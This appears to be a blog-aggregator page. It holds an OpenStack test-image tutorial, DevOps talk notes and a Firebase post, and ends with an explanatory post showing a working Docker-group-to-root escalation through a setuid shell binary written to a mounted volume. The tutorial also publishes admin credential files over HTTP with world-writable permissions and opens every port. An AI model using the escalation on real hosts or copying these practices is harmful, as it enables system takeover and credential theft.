  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_admin
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_admin
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_admin
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_admin

  echo "" >> /root/keystonerc_demo
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_demo
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_demo
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_demo
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_demo
  echo export OS_POOL_NAME="public" >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_demo
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_demo
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_demo
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_demo
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_demo

  yum install -y wget git
  wget -O /usr/local/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/master/gimme
  chmod +x /usr/local/bin/gimme
  eval "$(/usr/local/bin/gimme 1.8)"
  export GOPATH=$HOME/go
  export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

  go get github.com/gophercloud/gophercloud
  pushd ~/go/src/github.com/gophercloud/gophercloud
  go get -u ./...
  popd

  cat >> /root/.bashrc <<EOF
  if [[ -f /usr/local/bin/gimme ]]; then
    eval "\$(/usr/local/bin/gimme 1.8)"
    export GOPATH=\$HOME/go
    export PATH=\$PATH:\$GOROOT/bin:\$GOPATH/bin
  fi

  gophercloudtest() {
    if [[ -n \$1 ]] && [[ -n \$2 ]]; then
      pushd  ~/go/src/github.com/gophercloud/gophercloud
      go test -v -tags "fixtures acceptance" -run "\$1" github.com/gophercloud/gophercloud/acceptance/openstack/\$2 | tee ~/gophercloud.log
      popd
    fi
  }
  EOF
+
+ systemctl stop openstack-cinder-backup.service
+ systemctl stop openstack-cinder-scheduler.service
+ systemctl stop openstack-cinder-volume.service
+ systemctl stop openstack-nova-cert.service
+ systemctl stop openstack-nova-compute.service
+ systemctl stop openstack-nova-conductor.service
+ systemctl stop openstack-nova-consoleauth.service
+ systemctl stop openstack-nova-novncproxy.service
+ systemctl stop openstack-nova-scheduler.service
+ systemctl stop neutron-dhcp-agent.service
+ systemctl stop neutron-l3-agent.service
+ systemctl stop neutron-lbaasv2-agent.service
+ systemctl stop neutron-metadata-agent.service
+ systemctl stop neutron-openvswitch-agent.service
+ systemctl stop neutron-metering-agent.service
+
+ mysql -e "update services set deleted_at=now(), deleted=id" cinder
+ mysql -e "update services set deleted_at=now(), deleted=id" nova
+ mysql -e "update compute_nodes set deleted_at=now(), deleted=id" nova
+ for i in $(openstack network agent list -c ID -f value); do
+   neutron agent-delete $i
+ done
+
+ systemctl stop httpd

The above adds three pieces to deploy.sh: set the hostname to localhost, stop all OpenStack services, and mark the existing Cinder, Nova, and Neutron services and agents as deleted.

Now, with the above in place, run… no, not yet, either.

Remember the last step outlined in the beginning of this post:

Upon creation of a new virtual machine, ensure OpenStack knows about the new unique information.

How is the new virtual machine going to configure itself with new information? One solution is to create an rc.local file and place it in the /etc directory during the Packer provisioning phase. This way, when the virtual machine launches, rc.local is triggered and acts as a post-boot script.
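
On CentOS 7, /etc/rc.local is handled by systemd's rc-local service, which only runs the script when it is executable (hence the chmod added below). A quick sanity check on a booted virtual machine looks something like this (a sketch; paths vary by distribution):

$ ls -l /etc/rc.local        # normally a symlink to /etc/rc.d/rc.local on CentOS 7
$ systemctl status rc-local  # confirm the unit exists and was started at boot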

Adding an rc.local File

First, add the following to deploy.sh:

  hostnamectl set-hostname localhost

  systemctl disable firewalld
  systemctl stop firewalld
  systemctl disable NetworkManager
  systemctl stop NetworkManager
  systemctl enable network
  systemctl start network

  yum install -y https://repos.fedorapeople.org/repos/openstack/openstack-ocata/rdo-release-ocata-3.noarch.rpm
  yum install -y centos-release-openstack-ocata
  yum-config-manager --enable openstack-ocata
  yum update -y
  yum install -y openstack-packstack
  packstack --answer-file /home/centos/files/packstack-answers.txt

  source /root/keystonerc_admin
  nova flavor-create m1.acctest 99 512 5 1 --ephemeral 10
  nova flavor-create m1.resize 98 512 6 1 --ephemeral 10
  _NETWORK_ID=$(openstack network show private -c id -f value)
  _SUBNET_ID=$(openstack subnet show private_subnet -c id -f value)
  _EXTGW_ID=$(openstack network show public -c id -f value)
  _IMAGE_ID=$(openstack image show cirros -c id -f value)

  echo "" >> /root/keystonerc_admin
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_admin
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_admin
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_admin
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_admin
  echo export OS_POOL_NAME="public" >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_admin
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_admin
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_admin
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_admin
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_admin

  echo "" >> /root/keystonerc_demo
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_demo
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_demo
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_demo
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_demo
  echo export OS_POOL_NAME="public" >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_demo
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_demo
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_demo
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_demo
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_demo

  yum install -y wget git
  wget -O /usr/local/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/master/gimme
  chmod +x /usr/local/bin/gimme
  eval "$(/usr/local/bin/gimme 1.8)"
  export GOPATH=$HOME/go
  export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

  go get github.com/gophercloud/gophercloud
  pushd ~/go/src/github.com/gophercloud/gophercloud
  go get -u ./...
  popd

  cat >> /root/.bashrc <<EOF
  if [[ -f /usr/local/bin/gimme ]]; then
    eval "\$(/usr/local/bin/gimme 1.8)"
    export GOPATH=\$HOME/go
    export PATH=\$PATH:\$GOROOT/bin:\$GOPATH/bin
  fi

  gophercloudtest() {
    if [[ -n \$1 ]] && [[ -n \$2 ]]; then
      pushd  ~/go/src/github.com/gophercloud/gophercloud
      go test -v -tags "fixtures acceptance" -run "\$1" github.com/gophercloud/gophercloud/acceptance/openstack/\$2 | tee ~/gophercloud.log
      popd
    fi
  }
  EOF

  systemctl stop openstack-cinder-backup.service
  systemctl stop openstack-cinder-scheduler.service
  systemctl stop openstack-cinder-volume.service
  systemctl stop openstack-nova-cert.service
  systemctl stop openstack-nova-compute.service
  systemctl stop openstack-nova-conductor.service
  systemctl stop openstack-nova-consoleauth.service
  systemctl stop openstack-nova-novncproxy.service
  systemctl stop openstack-nova-scheduler.service
  systemctl stop neutron-dhcp-agent.service
  systemctl stop neutron-l3-agent.service
  systemctl stop neutron-lbaasv2-agent.service
  systemctl stop neutron-metadata-agent.service
  systemctl stop neutron-openvswitch-agent.service
  systemctl stop neutron-metering-agent.service

  mysql -e "update services set deleted_at=now(), deleted=id" cinder
  mysql -e "update services set deleted_at=now(), deleted=id" nova
  mysql -e "update compute_nodes set deleted_at=now(), deleted=id" nova
  for i in $(openstack network agent list -c ID -f value); do
    neutron agent-delete $i
  done

  systemctl stop httpd

+ cp /home/centos/files/rc.local /etc
+ chmod +x /etc/rc.local

Next, create a file called rc.local inside the packer/files directory:

#!/bin/bash
set -x

export HOME=/root

sleep 60

systemctl restart rabbitmq-server
while [[ true ]]; do
  pgrep -f rabbit
  if [[ $? == 0 ]]; then
    break
  fi
  sleep 10
  systemctl restart rabbitmq-server
done

nova-manage cell_v2 discover_hosts

The above is pretty simple: it restarts RabbitMQ and runs nova-manage so the host re-discovers itself as a compute node.

Why restart RabbitMQ? I have no idea. I've found it needs to be done for OpenStack to work correctly.

I also mentioned I'll show how to access the OpenStack services from outside the virtual machine, so you don't have to log in to the virtual machine to run tests.

To do that, add the following to rc.local:

  #!/bin/bash
  set -x

  export HOME=/root

  sleep 60

+ public_ip=$(curl http://169.254.169.254/latest/meta-data/public-ipv4/)
+ if [[ -n $public_ip ]]; then
+   while true ; do
+     mysql -e "update endpoint set url = replace(url, '127.0.0.1', '$public_ip')" keystone
+     if [[ $? == 0 ]]; then
+       break
+     fi
+     sleep 10
+   done

+   sed -i -e "s/127.0.0.1/$public_ip/g" /root/keystonerc_demo
+   sed -i -e "s/127.0.0.1/$public_ip/g" /root/keystonerc_admin
+ fi

  systemctl restart rabbitmq-server
  while [[ true ]]; do
    pgrep -f rabbit
    if [[ $? == 0 ]]; then
      break
    fi
    sleep 10
    systemctl restart rabbitmq-server
  done

+ systemctl restart openstack-cinder-api.service
+ systemctl restart openstack-cinder-backup.service
+ systemctl restart openstack-cinder-scheduler.service
+ systemctl restart openstack-cinder-volume.service
+ systemctl restart openstack-nova-cert.service
+ systemctl restart openstack-nova-compute.service
+ systemctl restart openstack-nova-conductor.service
+ systemctl restart openstack-nova-consoleauth.service
+ systemctl restart openstack-nova-novncproxy.service
+ systemctl restart openstack-nova-scheduler.service
+ systemctl restart neutron-dhcp-agent.service
+ systemctl restart neutron-l3-agent.service
+ systemctl restart neutron-lbaasv2-agent.service
+ systemctl restart neutron-metadata-agent.service
+ systemctl restart neutron-openvswitch-agent.service
+ systemctl restart neutron-metering-agent.service
+ systemctl restart httpd

  nova-manage cell_v2 discover_hosts

+ iptables -I INPUT -p tcp --dport 80 -j ACCEPT
+ ip6tables -I INPUT -p tcp --dport 80 -j ACCEPT
+ cp /root/keystonerc* /var/www/html
+ chmod 666 /var/www/html/keystonerc*

Three steps have been added above:

The first queries the metadata service to discover the virtual machine's public IP. Once the public IP is known, the endpoint table in the keystone database is updated with it. By default, PackStack sets the endpoints of the Keystone catalog to 127.0.0.1. This prevents outside interaction with OpenStack. Changing it to the public IP resolves this issue.

The keystonerc_demo and keystonerc_admin files are also updated with the public IP.

Why not just set the public IP in the PackStack answer file? Because the public IP will not be known until the virtual machine launches, which is after PackStack has run. And that's why 127.0.0.1 was used earlier: it's an easy placeholder to search and replace, and it still produces a working OpenStack environment even if it's never replaced.

The second step restarts all OpenStack services so they're aware of the new endpoints.

The third step copies the keystonerc_demo and keystonerc_admin files to /var/www/html/. This way, you can wget the files from http://public-ip/keystonerc_demo and http://public-ip/keystonerc_admin and save them to your workstation. You can then source them and begin interacting with OpenStack remotely.
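
Once a virtual machine built from this image is up, you can verify remote access from your workstation with something like the following (replace the placeholder with the instance's floating IP):

$ wget http://<public ip>/keystonerc_demo
$ source keystonerc_demo
$ openstack catalog list   # the endpoints should now reference the public IP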

Now, with all of that in place, re-run Packer:

$ pwd
/home/jtopjian/terraform-openstack-test/packer/openstack
$ packer build \
    -var 'flavor=m1.large' \
    -var 'secgroup=AllowAll' \
    -var 'image_id=9abadd38-a33d-44c2-8356-b8b8ae184e04' \
    -var 'pool=public' \
    -var 'network_id=b0b12e8f-a695-480e-9dc2-3dc8ac2d55fd' \
    build.json

Using the Image

When the build is complete, you will have a new image called packstack-ocata that you can create a virtual machine with.

As an example, you can use Terraform to launch the image:

variable "key_name" {}
variable "network_id" {}

variable "pool" {
  default = "public"
}

variable "flavor" {
  default = "m1.xlarge"
}

data "openstack_images_image_v2" "packstack" {
  name        = "packstack-ocata"
  most_recent = true
}

resource "random_id" "security_group_name" {
  prefix      = "openstack_test_instance_allow_all_"
  byte_length = 8
}

resource "openstack_networking_floatingip_v2" "openstack_acc_tests" {
  pool = "${var.pool}"
}

resource "openstack_networking_secgroup_v2" "openstack_acc_tests" {
  name        = "${random_id.security_group_name.hex}"
  description = "Rules for openstack acceptance tests"
}

resource "openstack_networking_secgroup_rule_v2" "openstack_acc_tests_rule_1" {
  security_group_id = "${openstack_networking_secgroup_v2.openstack_acc_tests.id}"
  direction         = "ingress"
  ethertype         = "IPv4"
  protocol          = "tcp"
  port_range_min    = 1
  port_range_max    = 65535
  remote_ip_prefix  = "0.0.0.0/0"
}

resource "openstack_networking_secgroup_rule_v2" "openstack_acc_tests_rule_2" {
  security_group_id = "${openstack_networking_secgroup_v2.openstack_acc_tests.id}"
  direction         = "ingress"
  ethertype         = "IPv6"
  protocol          = "tcp"
  port_range_min    = 1
  port_range_max    = 65535
  remote_ip_prefix  = "::/0"
}

resource "openstack_networking_secgroup_rule_v2" "openstack_acc_tests_rule_3" {
  security_group_id = "${openstack_networking_secgroup_v2.openstack_acc_tests.id}"
  direction         = "ingress"
  ethertype         = "IPv4"
  protocol          = "udp"
  port_range_min    = 1
  port_range_max    = 65535
  remote_ip_prefix  = "0.0.0.0/0"
}

resource "openstack_networking_secgroup_rule_v2" "openstack_acc_tests_rule_4" {
  security_group_id = "${openstack_networking_secgroup_v2.openstack_acc_tests.id}"
  direction         = "ingress"
  ethertype         = "IPv6"
  protocol          = "udp"
  port_range_min    = 1
  port_range_max    = 65535
  remote_ip_prefix  = "::/0"
}

resource "openstack_networking_secgroup_rule_v2" "openstack_acc_tests_rule_5" {
  security_group_id = "${openstack_networking_secgroup_v2.openstack_acc_tests.id}"
  direction         = "ingress"
  ethertype         = "IPv4"
  protocol          = "icmp"
  remote_ip_prefix  = "0.0.0.0/0"
}

resource "openstack_networking_secgroup_rule_v2" "openstack_acc_tests_rule_6" {
  security_group_id = "${openstack_networking_secgroup_v2.openstack_acc_tests.id}"
  direction         = "ingress"
  ethertype         = "IPv6"
  protocol          = "icmp"
  remote_ip_prefix  = "::/0"
}

resource "openstack_compute_instance_v2" "openstack_acc_tests" {
  name            = "openstack_acc_tests"
  image_id        = "${data.openstack_images_image_v2.packstack.id}"
  flavor_name     = "${var.flavor}"
  key_pair        = "${var.key_name}"
  security_groups = ["${openstack_networking_secgroup_v2.openstack_acc_tests.name}"]

  network {
    uuid = "${var.network_id}"
  }
}

resource "openstack_compute_floatingip_associate_v2" "openstack_acc_tests" {
  instance_id = "${openstack_compute_instance_v2.openstack_acc_tests.id}"
  floating_ip = "${openstack_networking_floatingip_v2.openstack_acc_tests.address}"
}

resource "null_resource" "rc_files" {
  provisioner "local-exec" {
    command = <<EOF
      while true ; do
        wget http://${openstack_compute_floatingip_associate_v2.openstack_acc_tests.floating_ip}/keystonerc_demo 2> /dev/null
        if [ $? = 0 ]; then
          break
        fi
        sleep 20
      done

      wget http://${openstack_compute_floatingip_associate_v2.openstack_acc_tests.floating_ip}/keystonerc_admin
    EOF
  }
}

The above Terraform configuration will do the following:

  1. Search for the latest image titled "packstack-ocata".
  2. Create a floating IP.
  3. Create a security group with a unique name and six rules to allow all TCP, UDP, and ICMP traffic.
  4. Launch an instance using the "packstack-ocata" image.
  5. Associate the floating IP to the instance.
  6. Poll the instance every 20 seconds to see if http://publicip/keystonerc_demo is available. When it is available, download it, along with keystonerc_admin.

To run this Terraform configuration, do:

$ terraform apply \
    -var "key_name=<keypair name>" \
    -var "network_id=<network uuid>" \
    -var "pool=<pool name>" \
    -var "flavor=<flavor name>"

Conclusion

This blog post detailed how to create a reusable image with OpenStack Ocata already installed. This allows you to create a standard testing environment in a fraction of the time that it takes to build the environment from scratch.

October 07, 2017 06:00 AM

October 05, 2017

The Lone Sysadmin

Stop Chrome Autoplay

If you didn’t catch this on Twitter: If you use Google Chrome, go to chrome://flags/#autoplay-policy and set it to “Document user activation is required.” Boom: no more auto-playing videos. You’re welcome. — Chris Meadows (@robotech_master) October 3, 2017 In short, go to chrome://flags/#autoplay-policy and set it to “Document user activation required.” It’s funny how simple things […]

The post Stop Chrome Autoplay appeared first on The Lone Sysadmin. Head over to the source to read the full post!

by Bob Plankers at October 05, 2017 04:35 PM

October 04, 2017

Simon Lyall

DevOps Days Auckland 2017 – Wednesday Session 3

Sanjeev Sharma – When DevOps met SRE: From Apollo 13 to Google SRE

  • Author of Two DevOps Books
  • Apollo 13
    • Who were the real heroes? The guys back at mission control. The astronauts just had to keep breathing and not die
  • Best Practice for Incident management
    • Prioritize
    • Prepare
    • Trust
    • Introspect
    • Consider Alternatives
    • Practice
    • Change it around
  • Big Hurdles to adoption of DevOps in Enterprise
    • Literature is only looking at one delivery platform at a time
    • Big enterprises have hundreds of platforms with completely different technologies, maturity levels, speeds. All interdependent
    • He divides platforms into:
      • Industrialised Core – Value High, Risk Low, MTBF
      • Agile/Innovation Edge – Value Low, Risk High, Rapid change and delivery, MTTR
      • Need normal distribution curve of platforms across this range
      • Need to be able to maintain products at both ends in one IT organisation
  • 6 capabilities needed in IT Organisation
    • Planning and architecture.
      • Your delivery pipeline will only be as fast as the slowest delivery pipeline it is dependent on
    • APIs
      • Modernizing to Microservices based architecture: Refactoring code and data and defining the APIs
    • Application Deployment Automation and Environment Orchestration
      • Devs are paid to code, not to maintain deployment and config scripts
      • Ops must provide env that requires devs to do zero setup scripts
    • Test Service and Environment Virtualisation
      • If you are doing 2-week sprints, but it takes 3 weeks to get a test server, how long are your sprints really?
    • Release Management
      • No good if 99% of software works but last 1% is vital for the business function
    • Operational Readiness for SRE
      • Shift between MTBF to MTTR
      • MTTR  = Mean time to detect + Mean time to Triage + Mean time to restore
      • + Mean time to pass blame
    • Antifragile Systems
      • Things that are neither fragile nor robust, but rather thrive on chaos
      • Cattle not pets
      • Servers may go red, but services are always green
    • DevOps: “Everybody is responsible for delivery to production”
    • SRE: “(Everybody) is responsible for delivering Continuous Business Value”

Share

by simon at October 04, 2017 03:04 AM

October 03, 2017

Simon Lyall

DevOps Days Auckland 2017 – Wednesday Session 2

Marcus Bristol (Pushpay) – Moving fast without crashing

  • Low tolerance for errors in production due to being in finance
  • Deploy twice per day
  • Just Culture – Balance safety and accountability
    • What rule?
    • Who did it?
    • How bad was the breach?
    • Who gets to decide?
  • Example of Retributive Culture
    • KPIs reflect incidents.
    • If more than 10% deploys bad then affect bonus
    • Reduced number of deploys
  • Restorative Culture
  • Blameless post-mortem
    • Can give detailed account of what happened without fear of retribution
    • Happens after every incident or near-incident
    • Written Down in Wiki Page
    • So everybody has the chance to have a say
    • Summary, Timeline, impact assessment, discussion, Mitigations
    • Mitigations become highest-priority work items
  • Our Process
    • Feature Flags
    • Science
    • Lots of small PRs
    • Code Review
    • Testers paired to devs so bugs can be fixed as soon as found
    • Automated testing
    • Pollination (reviews of code between teams)
    • Bots
      • Posts to Slack when feature flag has been changed
      • Nags about feature flags that seems to be hanging around in QA
      • Nags about Flags that have been good in prod for 30+ days
      • Every merge
      • PRs awaiting reviews for long time (days)
      • Missing postmortem mitigations
      • Status of builds in build farm
      • When deploy has been made
      • Health of API
      • Answer queries on team member list
      • Create ship train of PRs into a build and user can tell bot to deploy to each environment

Share

by simon at October 03, 2017 10:39 PM

DevOps Days Auckland 2017 – Wednesday Session 1

Michael Coté – Not actually a DevOps Talk

Digital Transformation

  • Goal: deliver value, weekly reliably, with small patches
  • Management must be the first to fail and transform
  • Standardize on a platform: special snowflakes are slow, expensive and error prone (see his slide, good list of stuff that should be standardized)
  • Ramping up: “Pilot low-risk apps, and ramp-up”
  • Pair programming/working
    • Half the advantage is people spend less time on reddit “research”
  • Don’t go to meetings
  • Automate compliance, have what you do automatic get logged and create compliance docs rather than building manually.
  • Crafting Your Cloud-Native Strategy

Sajeewa Dayaratne – DevOps in an Embedded World

  • Challenges on Embedded
    • Hardware – resource constrained
    • Debugging – OS bugs, Hardware Bugs, UFO Bugs – Oscilloscopes and JTAG connectors are your friend.
    • Environment – Thermal, Moisture, Power consumption
    • Deploy to product – Multi-month cycle, hard or impossible to send updates to ships at sea.
  • Principles of DevOps equally apply to embedded
    • High Frequency
    • Reduce overheads
    • Improve defect resolution
    • Automate
    • Reduce response times
  • Navico
    • Small Sonar, Navigation for medium boats, Displays for sail (eg Americas cup). Navigation displays for large ships
    • Dev around world, factory in Mexico
  • Codebase
    • 5 million lines of code
    • 61 Hardware Products supported – Increasing steadily, very long lifetimes for hardware
    • Complex network of products – lots of products on boat all connected, different versions of software and hardware on the same boat
  • Architecture
    • Old codebase
    • Backward compatible with old hardware
    • Needs to support new hardware
    • Desire new features on all products
  • What does this mean
    • Defects were found too late
    • Very high cost of bugs found late
    • Software stabilization taking longer
    • Manual test couldn’t keep up
    • Cost increasing , including opportunity cost
  • Does CI/CD provide answer?
    • But will it work here?
    • Case Study from HP. Large-Scale Agile Development by Gary Gruver
  • Our Plan
    • Improve tools and architecture
    • Build Speeds
    • Automated testing
    • Code quality control
  • Previous VCS
    • Proprietary tool with limited support and upgrades
    • Limited integration
    • Lack of CI support
    • No code review capacity
  • Move to git
    • Code reviews
    • Integrated CI
    • Supported by tools
  • Architecture
    • Had a configurable codebase already
    • Fairly common hardware platform (only 9 variations)
    • Had runtime feature flags
    • But
      • Cyclic dependencies – 1.5 years to clean these up
      • Singletons – cut down
      • Promote unit testability – worked on
      • Many branches – long lived – mega merges
  • Went to a single Branch model, feature flags, smaller batch sizes, testing focused on single branch
  • Improve build speed
    • Start 8 hours to build Linux platform, 2 hours for each app, 14+ hours to build and package a release
    • Options
      • Increase speed
      • Parallel Builds
    • What did
      • ccache, clcache
      • IncrediBuild
      • distcc
    • 4-5 hrs down to 1h
  • Test automation
    • Existing tests were mock-ups of the hardware, so not typical
    • Started with micro-test
      • Unit testing (simulator)
      • Unit testing (real hardware)
    • Build Tools
      • Software tools (n2k simulator, remote control)
      • Hardware tools (mimic real-world data, repurpose existing stuff)
    • UI Test Automation
      • Build or Buy
      • Functional testing vs API testing
      • HW Test tools
      • Took 6 hours to do full test on hardware.
  • PipeLine
    • Commit -> pull request
    • Automated Build / Unit Tests
    • Daily QA Build
  • Next?
    • Configuration as code
    • Code Quality tools
    • Simulate more hardware
    • Increase analytics and reporting
    • Fully simulated test env for dev (so the devs don’t need the hardware)
    • Scale – From internal infrastructure to the cloud
    • Grow the team
  • Lessons Learnt
    • Culture!
    • Collect Data
    • Get Executive Buy in
    • Change your tools and processes if needed
    • Test automation is the key
      • Invest in HW
      • Simulate
      • Virtualise
    • Focus on good software design for Everything

Share

by simon at October 03, 2017 09:29 PM

Sarah Allen

ultimate serverless combo: Firestore + Functions

Serverless development just got easier — today’s release of Cloud Firestore with event triggers for Cloud Functions combine to offer significant developer velocity from idea to production to scale.

I’ve worked on dozens of mobile and web apps and have always been dismayed by the amount of boilerplate code needed to shuffle data between client and server and implement small amounts of logic on the server-side. Serverless APIs + serverless compute reduce the amount of code needed to write an app, increasing velocity throughout the development cycle. Less code means fewer bugs.

Cloud Firestore + Cloud Functions with direct-from-mobile access enabled by Firebase Auth and Firebase Rules combine to deliver something very new in this space. Unhosted Web apps are also enabled by Web SDKs.

It is not a coincidence that I’ve worked on all of these technologies since joining Google last year. My first coding project at Google was developing the initial version of the Firestore UI in the Firebase Console. I then stepped into an engineering management role, leading the engineering teams that work on server-side code where Firebase enables access to Google Cloud.

Cloud Firestore

  • Realtime sync across Web and mobile clients: This is not just about realtime apps. Building user interfaces is substantially easier: using reactive patterns and progressively filling in details allows apps to be ready for user interaction faster.
  • Scales with the size of the result set: Simple apps are simple. For complex apps, you still need to be thoughtful about modeling your data, and the reward is that anything that works for you and your co-workers will scale to everyone on the planet using your app. From my perspective, this is the most significant and exciting property of the Cloud Firestore.
  • iOS, Android and Web SDKs

Cloud Functions

  • Events for create, write, update, and delete (learn how)
  • Write and deploy JavaScript functions that do exactly and only what you need
  • You can also use TypeScript (JS SDKs include typings)

All the Firebase things

  • Free tier and when you exceed that, you only pay for what you use.
  • Zero to planet scale: no sharding your database, no calculating how many servers you need, focus on how your app works.
  • Secure data access with Firebase Rules: simple, yet powerful declarative syntax to specify what data can be accessed by client code. For example, some data may be read-only access for social sharing or public parts of an app, user data might be only written by that user, and some other data may be only written by server-code.
  • Firebase Auth: all the social logins, email/password, phone or you can write code for custom auth
  • Lots more Firebase things

All this combines to allow developers to focus on building an app, writing new code that offers unique value. It’s been a while since I’ve been actually excited about new technology that has immediate and practical use cases. I’m so excited to be able to use this tech in the open for my side projects, and can’t wait to see the serious new apps…..

by sarah at October 03, 2017 05:07 PM

October 02, 2017

Anton Chuvakin - Security Warrior

Monthly Blog Round-Up – September 2017

Here is my next monthly "Security Warrior" blog round-up of top 5 popular posts/topics this month:
  1. “Why No Open Source SIEM, EVER?” contains some of my SIEM thinking from 2009 (oh, wow, ancient history!). Is it relevant now? You be the judge. Succeeding with SIEM requires a lot of work, whether you paid for the software, or not. BTW, this post has an amazing “staying power” that is hard to explain – I suspect it has to do with people wanting “free stuff” and googling for “open source SIEM” …
  2. “New SIEM Whitepaper on Use Cases In-Depth OUT!” (dated 2010) presents a whitepaper on select SIEM use cases described in depth with rules and reports [using now-defunct SIEM product]; also see this SIEM use case in depth and this for a more current list of popular SIEM use cases. Finally, see our 2016 research on developing security monitoring use cases here.
  3. “Simple Log Review Checklist Released!” is often at the top of this list – this aging checklist is still a very useful tool for many people. “On Free Log Management Tools” (also aged a bit by now) is a companion to the checklist (updated version)
  4. Again, my classic PCI DSS Log Review series is extra popular! The series of 18 posts cover a comprehensive log review approach (OK for PCI DSS 3+ even though it predates it), useful for building log review processes and procedures, whether regulatory or not. It is also described in more detail in our Log Management book and mentioned in our PCI book (now in its 4th edition!) – note that this series is mentioned in some PCI Council materials. 
  5. “SIEM Bloggables” is a very old post, more like a mini-paper on some key aspects of SIEM, use cases, scenarios, etc as well as 2 types of SIEM users.
In addition, I’d like to draw your attention to a few recent posts from my Gartner blog [which, BTW, now has more than 5X of the traffic of this blog]: 

Current research on SIEM:
Planned research on SOAR (security orchestration,  automation and response):
Planned research on MSSP:

Miscellaneous fun posts:

(see all my published Gartner research here)
Also see my past monthly and annual “Top Popular Blog Posts” – 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016.

Disclaimer: most content at SecurityWarrior blog was written before I joined Gartner on August 1, 2011 and is solely my personal view at the time of writing. For my current security blogging, go here.

Previous post in this endless series:

by Anton Chuvakin (anton@chuvakin.org) at October 02, 2017 03:13 PM

September 30, 2017

Electricmonk.nl

Root your Docker host in 10 seconds for fun and profit

Disclaimer: There is no actual profit. That was just one of those clickbaity things everybody seems to like so much these days. Also, it's not really fun. Alright, on with the show!

A common practice is to add users that need to run Docker containers on your host to the docker group. For example, an automated build process may need a user on the target system to stop and recreate containers for testing or deployments. What is not obvious right away is that this is basically the same as giving those users root access. You see, the Docker daemon runs as root, and when you add users to the docker group, they get full control over the Docker daemon.
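
For reference, that is typically done with something like the following (the user name is hypothetical):

$ sudo usermod -aG docker deploy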

So how hard is it to exploit this and become root on the host if you are a member of the docker group? Not very hard at all…

$ id
uid=1000(fboender) gid=1000(fboender) groups=1000(fboender), 999(docker)
$ cd docker2root
$ docker build --rm -t docker2root .
$ docker run -v /tmp/persist:/persist docker2root:latest /bin/sh root.sh
$ /tmp/persist/rootshell
# id
uid=0(root) gid=1000(fboender) groups=1000(fboender),999(docker)
# ls -la /root
total 64
drwx------ 10 root root 4096 aug  1 10:32 .
drwxr-xr-x 25 root root 4096 sep 19 05:51 ..
-rw-------  1 root root  366 aug  3 09:26 .bash_history

So yeah, that took all of 3 seconds. I know I said 10 in the title, but the number 10 has special SEO properties. Remember, this is on the Docker host, not in a container or anything!

How does it work?

When you mount a volume into a container, that volume is mounted as root. By default, processes in a container also run as root. So all you have to do is write a setuid root owned binary to the volume, which will then appear as a setuid root binary on the host in that volume too.

Here's what the Dockerfile looks like:

FROM alpine:3.5
COPY root.sh root.sh
COPY rootshell rootshell

The rootshell file is a binary compiled from the following source code (rootshell.c):

#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid() */

int main()
{
   setuid( 0 );          /* set the real UID to root so the spawned shell keeps it */
   system( "/bin/sh" );  /* drop into an interactive shell */
   return 0;
}

The wrapper isn't strictly needed, but most shells and many other programs refuse to run as a setuid binary, so a tiny C program that calls setuid(0) before spawning a shell is the simplest way in.

The root.sh file simply copies the rootshell binary to the volume and sets the setuid bit on it:

#!/bin/sh

cp rootshell /persist/rootshell
chmod 4777 /persist/rootshell

That's it.

Why I don't need to report this

I don't need to report this, because it is a well-known vulnerability. In fact, it's one of the less worrisome ones; there are plenty more, including all kinds of privilege escalation vulnerabilities from inside containers, etc. As far as I know, it hasn't been fixed in the latest Docker, nor will it be fixed in future versions. This is in line with the modern stance on security in the tech world: "security? What's that?" Docker goes so far as to call them "non-events". Newspeak if I ever heard it.

Some choice bullshit quotes from the Docker frontpage and documentation:

Secure by default: Easily build safer apps, ensure tamper-proof transit of all app components and run apps securely on the industry’s most secure container platform.

LOL, sure.

We want to ensure that Docker Enterprise Edition can be used in a manner that meets the requirements of various security and compliance standards.

Either that same courtesy does not extend to the community edition, security by default is no longer a requirement, or it's a completely false claim.

They do make some casual remarks about not giving access to the docker daemon to untrusted users in the Security section of the documentation:

only trusted users should be allowed to control your Docker daemon

